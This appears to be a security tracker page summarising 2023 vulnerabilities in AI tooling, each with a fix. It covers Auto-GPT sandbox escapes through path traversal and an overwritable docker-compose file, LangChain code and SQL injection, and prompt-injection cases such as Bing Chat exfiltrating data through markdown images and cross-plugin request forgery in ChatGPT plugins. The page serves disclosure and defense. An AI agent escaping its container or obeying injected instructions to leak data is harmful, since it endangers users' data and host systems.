All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Auto-GPT versions before 0.4.3 have a path traversal vulnerability (a weakness where an attacker uses file paths like '../../../' to access files outside the intended directory) in the `execute_python_code` command that fails to validate filenames, allowing an attacker to write malicious code outside the sandbox and execute arbitrary commands on the host system. This vulnerability bypasses the Docker container (a tool that isolates applications) meant to protect the main system from untrusted code.
Fix: The issue has been patched in version 0.4.3. As a workaround, run Auto-GPT in a virtual machine or another environment in which damage to files or corruption of the program is not a critical problem.
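The missing check is a classic resolve-and-compare guard. The sketch below is illustrative only (the names `WORKSPACE` and `safe_workspace_path` are ours, not Auto-GPT's actual code): it resolves the user-supplied filename and rejects any result that escapes the sandbox directory.

```python
from pathlib import Path

# Illustrative sandbox root; Auto-GPT's real workspace path may differ.
WORKSPACE = Path("/app/workspace").resolve()

def safe_workspace_path(filename: str) -> Path:
    """Resolve a user-supplied filename and reject paths that escape the workspace."""
    candidate = (WORKSPACE / filename).resolve()
    # resolve() collapses any '../' components, so a traversal attempt like
    # '../../../etc/cron.d/job' resolves to a path outside WORKSPACE.
    if candidate != WORKSPACE and WORKSPACE not in candidate.parents:
        raise ValueError(f"path traversal blocked: {filename!r}")
    return candidate
```

The key point is comparing the *resolved* path against the sandbox root; checking the raw string for `..` is not enough, since symlinks and encoded separators can slip past string filters.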
Source: NVD/CVE Database

Auto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.
OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.
A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.
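Because SQLDatabaseChain executes SQL that a language model generates from user input, a common mitigation for this class of flaw is to validate the generated statement before it reaches the database. The guard below is a hedged sketch of that idea, not LangChain's actual fix; the function name and keyword list are ours:

```python
import re

# Illustrative denylist of write/DDL keywords; a real deployment would also
# use a read-only database role rather than rely on filtering alone.
FORBIDDEN = re.compile(
    r"\b(insert|update|delete|drop|alter|create|grant|attach|pragma)\b", re.I
)

def is_read_only_select(sql: str) -> bool:
    """Accept only a single SELECT statement with no write/DDL keywords."""
    statement = sql.strip().rstrip(";")
    if ";" in statement:  # a second statement smuggled in after the SELECT
        return False
    if not statement.lower().startswith("select"):
        return False
    return not FORBIDDEN.search(statement)
```

Defense in depth matters here: even with such a filter, connecting the chain with least-privilege database credentials limits what any injected statement can do.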
CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain component, which passes generated code to Python's exec method. This is a type of injection attack (CWE-74, where an attacker inserts malicious content into input that the system processes as commands).
CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).
Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the source material does not detail how it works or assign a severity rating.
Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.
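The exfiltration channel is the image URL itself: the injected instructions make the model emit something like `![](https://attacker.example/log?d=SECRET)`, and rendering that markdown triggers a request carrying the data. One defense is to drop images whose host is not on an allowlist before rendering. The sketch below is illustrative, not Bing Chat's actual fix; the allowlist and function names are assumptions:

```python
import re
from urllib.parse import urlparse

# Assumed allowlist for the sketch; a real client would list its own CDN hosts.
ALLOWED_IMAGE_HOSTS = {"example.com"}

# Matches markdown image syntax ![alt](url ...) and captures the URL.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """Remove markdown images whose host is not explicitly allowlisted."""
    def replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else ""
    return IMAGE_MD.sub(replace, markdown)
```

This addresses only the markdown-image channel; other auto-fetched resources (links the client prefetches, for instance) need the same treatment.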
Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input.
Gradio, an open-source Python library for building machine learning and data science applications, has a vulnerability where it fails to properly filter file paths and restrict which URLs can be proxied (accessed through Gradio as an intermediary), allowing unauthorized file access. This vulnerability affects input validation (the process of checking that data entering a system is safe and expected).
ChuanhuChatGPT (a graphical interface for ChatGPT and other large language models) has a vulnerability in versions 20230526 and earlier that allows attackers to access the config.json file (a configuration file storing sensitive settings) without permission when authentication is disabled, letting them steal API keys (credentials that grant access to external services) stored there.
gpt_academic (a tool that provides a graphical interface for ChatGPT/GLM) versions 3.37 and earlier have a vulnerability where the Configuration File Handler allows attackers to read sensitive files through the `/file` route because no files are protected from access. This can leak sensitive information from working directories to users who shouldn't have access to it.
Autolab, a service that automatically grades programming assignments in courses, has a tar slip vulnerability (a flaw where extracted files can be placed outside their intended directory) in its assessment installation feature. An attacker with instructor permissions could upload a specially crafted tar file (a compressed archive format) with file paths like `../../../../tmp/tarslipped1.sh` to place files anywhere on the system when the form is submitted.
Autolab, a service that manages programming courses and automatically grades assignments, has a tar slip vulnerability (a flaw where compressed files can extract to unintended locations outside their target directories) in its MOSS cheat checker feature. An authenticated instructor could upload a specially crafted tar file (compressed archive) that extracts files to arbitrary locations on the system, potentially allowing them to write malicious files anywhere the service has access.
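The fix for both tar slip issues follows the same pattern as any path traversal defense: resolve each archive member's destination and refuse anything that lands outside the extraction directory. The sketch below is our illustration, not Autolab's code (Autolab is Ruby; the logic is shown in Python for consistency with the other examples here):

```python
import tarfile
from pathlib import Path

def safe_extract(archive: str, dest: str) -> None:
    """Extract a tar archive, rejecting members that escape the target directory."""
    dest_path = Path(dest).resolve()
    with tarfile.open(archive) as tar:
        for member in tar.getmembers():
            target = (dest_path / member.name).resolve()
            # e.g. '../../../../tmp/tarslipped1.sh' resolves outside dest_path
            if target != dest_path and dest_path not in target.parents:
                raise ValueError(f"blocked tar slip entry: {member.name}")
        tar.extractall(dest_path)
```

On Python 3.12 and later, `tar.extractall(dest_path, filter="data")` performs an equivalent check in the standard library itself.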
CVE-2023-28382 is a directory traversal vulnerability (a flaw that lets attackers access files outside intended directories) in ESS REC Agent Server Edition across multiple operating systems. An authenticated attacker (someone with valid login credentials) can use this vulnerability to view or modify any file on the affected server. The vulnerability affects versions 1.0.0 to 1.4.3 on Linux, 1.1.0 to 1.4.0 on Solaris and HP-UX, and 1.2.0 to 1.4.1 on AIX.
CVE-2023-2800 is a vulnerability in the Hugging Face Transformers library (a popular tool for working with AI language models) prior to version 4.30.0 that involves insecure temporary files (CWE-377, a weakness where temporary files are created in ways that attackers could exploit). The vulnerability was discovered and reported through the huntr.dev bug bounty platform.
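CWE-377 typically arises when code builds a temporary file name it can predict (as `tempfile.mktemp` does), leaving a window in which an attacker can pre-create or symlink that path before it is opened. The sketch below shows the standard safe pattern; it is a generic illustration of the weakness class, not the transformers code or its patch:

```python
import os
import tempfile

def write_data_safely(data: bytes) -> str:
    """Create and write a temp file atomically, avoiding the mktemp() race.

    mkstemp() creates and opens the file in one step with owner-only
    permissions (0o600), so no attacker can pre-place a file or symlink
    at the returned path.
    """
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
    return path
```

`tempfile.NamedTemporaryFile` offers the same guarantee with automatic cleanup; the unsafe primitive to avoid is `tempfile.mktemp`, which only returns a name.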
Fix: Update to Auto-GPT version 0.4.3 or later, as the issue has been patched in that version.
Source: NVD/CVE Database

Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.
Fix: Update langchain to version v0.0.247 or later.
Source: NVD/CVE Database

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003
Source: NVD/CVE Database

Fix: Upgrade LangChain to version 0.0.236 or later.
Source: NVD/CVE Database

OpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the Confused Deputy Problem (where an attacker can manipulate a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.
Fix: Update Langchain to v0.0.225 or later, where the issue is patched.
Source: NVD/CVE Database

A security researcher created a demonstration website that shows how indirect prompt injection (tricking an AI by hiding instructions in web content it reads) can be used to hijack ChatGPT when the browsing feature is enabled. The demo lets users explore various AI-based attacks, including data theft and manipulation of ChatGPT's responses, to raise awareness of these vulnerabilities.
Fix: Users are advised to upgrade to version 3.34.0. The source notes there are no known workarounds for this vulnerability.
Source: NVD/CVE Database

Fix: The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication (a login system that restricts who can access the software) can help mitigate the vulnerability.
Source: NVD/CVE Database

Fix: A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, users can configure the project using environment variables instead of `config*.py` files, or use docker-compose installation (a tool for running containerized applications) to configure the project instead of configuration files.
Source: NVD/CVE Database

ChatGPT plugins can be exploited through indirect prompt injections (attacks that hide malicious instructions in data the AI reads from external sources rather than directly from the user), which hackers have used to access private data through cross-plugin request forgery (a vulnerability where one plugin tricks another into performing unauthorized actions). The post documents a real exploit found in the wild and explains the security fix that was applied.
Fix: Upgrade to version 2.11.0 or later.
Source: NVD/CVE Database

Fix: This issue has been addressed in version 2.11.0. Users are advised to upgrade.
Source: NVD/CVE Database

Fix: Update to version 4.30.0 or later. A patch is available at https://github.com/huggingface/transformers/commit/80ca92470938bbcc348e2d9cf4734c7c25cb1c43.
Source: NVD/CVE Database